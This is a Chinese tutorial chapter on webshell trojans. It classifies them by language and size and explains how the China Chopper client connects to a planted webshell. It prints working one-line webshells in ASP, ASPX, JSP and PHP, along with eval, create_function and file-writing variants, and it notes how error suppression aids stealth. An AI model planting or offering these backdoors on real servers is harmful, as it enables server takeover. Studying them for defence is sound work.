第十九章:web安全之webshell知识分享——webshell木马的分类及中国菜刀使用介绍
更新于:2019-10-15 20:18:23
二、webshell木马的分类
动态网页脚本常见的有这几种:asp、aspx、php、jsp、cgi。根据脚本语言的不同,webshell木马可分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。
可以编写web程序的语言不止这几种,Python脚本语言也可以写动态网页,也会有.py脚本木马。
只是语言的不同,在区别上都是大同小异。
网站多以PHP脚本语言为主,后面主要以PHP脚本木马为例做介绍。
根据功能上的划分,webshell木马又分为大马和小马。
备注:小马与一句话木马并没有实质区别,一句话木马也可以作为小马。
①小马
该webshell文件小,代码量小。包含的功能比较单一,实现的功能为一个或两个。主要为文件上传或服务端执行文件下载、命令执行等功能。
也多指为一句话木马,顾名思义就是只有一行代码的木马。代码虽少,危害性不比大马差。
asp的一句话是:
<%eval request ("pass")%>
aspx的一句话是:
<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
JSP的一句话是:
<%Runtime.getRuntime().exec(request.getParameter("i"));%>
php的一句话是:
<?php @eval($_POST['pass']);?>
分析下这段木马代码<?php @eval($_POST['pass']);?>:
$_POST['pass']:PHP解释器接受浏览器客户端以post形式发过来的pass参数值(是一段字符串)。
eval是PHP的一个语言构造器,使用方式和函数一样,不能被可变函数调用,暂且把它当做一个函数。它可以把一段字符串当PHP代码来执行。
@是可以屏蔽函数执行过程中遇到问题而产生的一些错误、警告信息,这样用户就看不到程序的出错信息。有助于木马的隐蔽性。
虽然这句代码很简单,它可以让网站执行客户端传递过去的任意PHP语句。这等于说PHP对服务器可以做到的事情,黑客都可以轻松操作。
PHP的一句话木马不是只有这一种写法,往网站提交数据可以使用post,也可以使用get和cookie,处理提交的字符串也不是只有eval这一个“函数”。一句话木马的形式可以有无数种。例如:
<?php $fun = create_function('',$_POST['a']);$fun();?>
使用create_function函数,可以达到eval一样的效果。$_POST['a']的值可以作为函数体代码。
<?php file_put_contents("./muma.php", $_POST['a']);?>
把PHP代码以字符串的形式提交网站,网站把它写入一个新的PHP文件,输入新文件路径即可执行代码。
②大马
“大”是相对“小”来说的,小马通常就是几行代码,想要使用丰富的功能需要提交批量代码,操作起来不方便。
大马:代码行数多,很多丰富的功能已写成代码放入了脚本文件里,使用起来更方便。“大马”的目的就是为了提权以及控制。
常见的“大马”一般都是功能较多结构也较为复杂的,“单一文件实现众多功能”是“大马”的设计目的之一,一方面大在功能,另一方面大在体积。
分享一个大马文件(杀毒软件会报毒)
大马文件dama5.php在PHP5.2版本运行
大马文件dama7.php在PHP7.0/5.4版本运行
两者木马的区别:
从危害程度上,应该是一样没区别的。
从隐蔽上。当管理员翻看网站代码文件时,可能网站代码文件多,只是看代码文件列表时不能发现异常,随意打开代码文件查看。
大马代码比较多,稍不注意的话,不易发觉这是后门木马。
小马如果单独写一文件里,比较容易发觉。
小马如果写到原有程序文件里,隐蔽性就要高很多。
从挂马难度上说,大马比小马难。在不能直接上传“大马”Webshell的情况下黑客通常会上传一个“小马”以协助完成上传“大马”。这个小马可能只有简单的上传功能。这就是所谓的“小马拉大马”。
从操作上,大马看似使用更方便,小马需要现传代码。其实,网站被挂了小马,可以借助工具,实现对网站的各种操作。
例如,工具有中国菜刀、中国蚁剑。
中国菜刀,一个非常好用而又强大的webshell,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用!不过被不法分子利用到,就是一个黑站的利器了。
不过中国菜刀不支持在PHP7下运行。
下面是中国菜刀使用示例:
小马文件放到网站根目录下
在中国菜刀上右键“添加”
双击就可以打开目标网站的文件目录,可新建删除修改上传文件,酷似一个FTP软件。
中国菜刀下载(杀毒软件报毒)